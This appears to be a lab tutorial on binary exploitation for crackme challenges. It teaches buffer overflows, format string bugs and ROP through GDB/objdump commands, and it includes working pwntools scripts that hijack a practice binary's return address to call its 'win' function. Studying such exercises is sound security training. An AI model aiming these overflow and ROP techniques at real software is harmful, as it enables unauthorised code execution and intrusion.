Master advanced binary exploitation techniques using command-line tools including buffer overflows, format string vulnerabilities, and Return-Oriented Programming (ROP) for crackme challenges.
Compatibility Note: Live debugging and exploitation exercises may not work on Apple Silicon (M1/M2/M3) due to emulation limitations. Static analysis and exploit theory remain fully applicable.
Understand stack-based buffer overflows using CLI tools
Exploit format string vulnerabilities with command-line debugging
Build ROP chains using CLI gadget finders
Occurs when input exceeds a buffer's capacity, overwriting adjacent memory including return addresses. Vulnerable functions include gets and strcpy.
Using printf(input) without format specifiers allows attackers to read/write memory by crafting input like %x or %n.
ROP chains use existing code snippets ("gadgets") to execute functions when the stack is non-executable (NX). Gadgets like pop rdi; ret set function arguments.
Find function addresses and analyze code
Debug exploits and find offsets
Python library for crafting exploits
Find ROP gadgets in binaries
# Start the Docker container
docker-compose up -d
docker-compose exec sec-env bash
# Navigate to workspace and examine the binary
cd /workspace
file static/example2
strings static/example2Apple Silicon Limitation: GDB debugging and exploit development may not work properly on Apple Silicon (M1/M2/M3) devices due to x86_64 emulation limitations. Static analysis tools and exploit theory will still be applicable.
# Get file information
file static/example2
# View strings to find interesting functions
strings static/example2
# Disassemble to find vulnerable functions
objdump -d static/example2 | grep -A 20 "<vuln>:"
objdump -d static/example2 | grep -A 20 "<win>:"
# Check for security features
checksec static/example2 # if available
readelf -a static/example2 | grep -i security
Vulnerability: Look for calls to gets or strcpy without bounds checking.
# Start GDB with GEF
gdb static/example2
# Set breakpoint at vulnerable function
(gdb) break vuln
(gdb) run
# When prompted, send a pattern to find offset
(gdb) pattern create 100
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaa
# Send the pattern and observe crash
(gdb) continue
# Find the offset
(gdb) pattern offset $rsp
# or
(gdb) pattern offset [crash_address]#!/usr/bin/env python3
from pwn import *
# Set up the context
context.arch = 'amd64'
context.os = 'linux'
# Create the process
p = process('./static/example2')
# Find the offset (example: 24 bytes)
offset = 24
# Create payload
payload = b"A" * offset
payload += p64(0x401196) # Address of win function (found with objdump)
# Send payload
p.sendline(payload)
# Get response
response = p.recvall()
print(response.decode())# Test format string vulnerability
echo "%x %x %x %x %x %x %x %x" | ./static/example2
# Use GDB to analyze format string
gdb static/example2
(gdb) break printf
(gdb) run
(gdb) x/10x $rsp # Examine stack
Format string vulnerabilities allow reading memory and potentially writing to memory using %n.
# Find ROP gadgets
ROPgadget --binary static/example2
# Find specific gadgets
ROPgadget --binary static/example2 --only "pop|ret"
ROPgadget --binary static/example2 --only "pop rdi|ret"
# Find function addresses
objdump -t static/example2 | grep win
objdump -t static/example2 | grep system#!/usr/bin/env python3
from pwn import *
context.arch = 'amd64'
context.os = 'linux'
p = process('./static/example2')
# ROP chain components
pop_rdi = 0x4011a3 # pop rdi; ret
win_addr = 0x401196 # win function address
# Build payload
payload = b"A" * 24 # offset
payload += p64(pop_rdi)
payload += p64(0xdeadbeef) # argument
payload += p64(win_addr)
p.sendline(payload)
print(p.recvall().decode())Use GDB to find the exact offset and craft a working exploit.
Use format strings to leak memory addresses and bypass ASLR.
Build a ROP chain to call functions with specific arguments.
Create shellcode payloads using pwntools for different architectures.
CLI tools like objdump and GDB are essential for finding vulnerabilities and crafting exploits
pwntools provides powerful Python libraries for exploit development and automation
ROPgadget helps find useful code snippets for building ROP chains